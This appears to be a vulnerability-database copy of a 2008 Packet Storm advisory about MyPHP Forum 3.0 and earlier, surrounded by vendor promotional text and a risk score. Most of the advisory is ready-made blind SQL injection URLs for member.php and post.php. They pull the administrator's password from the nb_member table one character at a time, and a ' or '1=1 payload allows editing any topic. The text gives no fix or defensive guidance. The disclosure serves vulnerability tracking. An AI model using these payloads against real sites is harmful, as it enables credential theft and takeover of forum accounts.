Lucene search

myphpforum-sql.txt

🗓️ 30 Oct 2008 00:00:00Reported by StAkeRType

packetstorm🔗 packetstormsecurity.com👁 19 Views

MyPHP Forum (Final) <= 3.0 Remote Vulnerabilities, Blind SQL Injection in member.php and post.ph

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

`/*  
-----------------------------------------------------------------------------------  
MyPHP Forum (Final) <= 3.0 (Edit Topics/Blind SQL Injection) Remote Vulnerabilities  
-----------------------------------------------------------------------------------  
Discovered By StAkeR[at]hotmail[dot]it  
Download On http://www.myphp.ws/  
  
  
- member.php (confirm - Blind SQL Injection)  
- member.php?action=confirm&id=' or ascii(substring((select password from nb_member where uid=1),1,1))=98/*   
  
- member.php (newconfirm - Blind SQL Injection)  
- member.php?action=newconfirm&user=' or ascii(substring((select password from nb_member where uid=1),1,1))=98--  
  
- member.php?action=reqpwd (reqpwd - Blind SQL Injection)  
- insert ' or ascii(substring((select password from nb_member where uid=1),1,1))=98#  
  
- post.php (post Blind SQL Injection)  
- post.php?action=post&fid=1&tid=1&quote=' or ascii(substring((select password from nb_member where uid=1),1,1))=9%23  
  
- post.php (edit - Edit Topics)  
- post.php?action=edit&fid=1&tid=1&pid=[id topic] ' or '1=1  
  
  
  
  
/*   
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

30 Oct 2008 00:00Current

7.4High risk

Vulners AI Score7.4